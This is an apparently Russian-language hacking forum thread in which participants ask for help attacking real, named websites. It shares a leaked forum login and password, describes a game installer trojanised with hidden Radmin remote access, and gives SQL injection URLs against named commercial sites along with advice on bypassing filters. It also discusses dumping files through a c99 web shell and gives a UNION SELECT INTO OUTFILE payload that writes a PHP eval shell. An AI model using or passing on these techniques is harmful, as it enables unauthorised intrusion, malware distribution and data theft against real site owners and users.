Ваши вопросы по уязвимостям.

Помогите залить шелл

http://torrent.vstrezhevom.ru/forum/
Логин [TM]*SH@RK
Пасс 123456

Народ помогите пожалуйста залить шелл и скажите плизз как почистить логи!!!! прошу!

 

ну например скачал я игру в ехе и запустил установку, а в ехешнике игры находится радмин и файл реестра который делает скрытым присутствие радмина и устанавливает свой пароль, и сразу же после запуска файла реестра, запускается ещё одна скрытая программа, которая нажимает ДА для того чтобы данные были внесены, и поэтому запуск файла реестра не вызывает подозрения, ведь он сам запустился. короче говоря былобы не плохо если есть микро прога которая автоматом жмёт кнопку ентер два раза подряд
Во

 

фаэрвол будет ругаться и антивирус

 

ну незнаю почему он должен ругаться?? ладно фаервол крикнет ченить, но ведь игра устанавливается, значит так надо для игры а антивирус то чего будет кричать? яу меня вон установлен нод 32 так я реестр скопировал а потом запускаю его и ничего не кричит, да и с чего вдруг ему кричать?

 

Откуда ему взятся
http://www.technodom.kz/admin/

Authorization: Basic

 

jokester, базовую авторизацию мона и в скрипте реалиховать, не обязательно это настройка апача ;-)

 

Конечно можно, можно даже эмулировать инъекцию, и выдавать абсолютно левые результаты. Но мы ведь реалисты, верно?

 

он будет говорить,что это троян!Даже бат он распознает как троя!

 

Нужен человек,который очень хорошо разбирается в SQL inj ).Нужен,так сказать,консалтинг чтоли,ибо в паблик кидать - спалюсь.Кину в ПМ )

 

ПМ погомогу А лучше в icq найдешь её когда стукнеш в ПМ

 

http://www.exportbureau.com/trade_leads.html?lead=99999999999999999999999999
Дальше стоит фильтрация на order by и union select
Че делать?

http://www.tbc-world.com/resprofile.asp?id=-5685946+order+by+25--&lng=en&companytype=2
Вот еще одна конторка. по моему тоже фильтрация стоит.

 

Народ есть шелл с99 от маднета
так вот нужно слить все файлы с сайта (знаю что обсуждался такой вопрос тут)
но на сервере стоит виндувс 2008 как тут тогда быть?

 

molotovkeyt, первая ссылка не открывается, вторая:

 

Вот, не помню кто вылаживал, скрипт на пхп,http://slil.ru/26579035. Еще можно попробывать архиваторы из unix - версии под windows,например tar, но я хз будет ли он работать под 2008.

 

вот еще что,
есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
???
Кусочек кода при катором начинается скачка

Code:

<?php

include_once("init.php");

$GLOBALS['db']->Execute("SET NAMES utf8"); 
$st = $GLOBALS['db']->Prepare("SELECT `filename`, `origname` FROM ".DB_PREFIX."_demos WHERE demtype=? and demid=?");
$res = $GLOBALS['db']->Execute($st,array($_GET['type'],$_GET['id']));
header('Content-type: application/force-download');
header('Content-Transfer-Encoding: Binary');
header('Content-disposition: attachment; filename='.$res->fields[1]);
@readfile(SAVE_FILES . "/" . $res->fields[0]);
?> 

SAVE_FILES - путь откуда скачиваються файл

 

неполучится скачать, нет SQL-инекции в запросе

 

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'shell.php'

тоже нужно переводить в чар?

 

первая сточка

необязательно (левая часть)

 

Нужен путь. Так тоже зальёт, но в папку с базой, из веба не увидешь. В чар нельзя путь переводить

'/путь/shell.php'

 

http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'http://target/shell.php'

так можно?jokester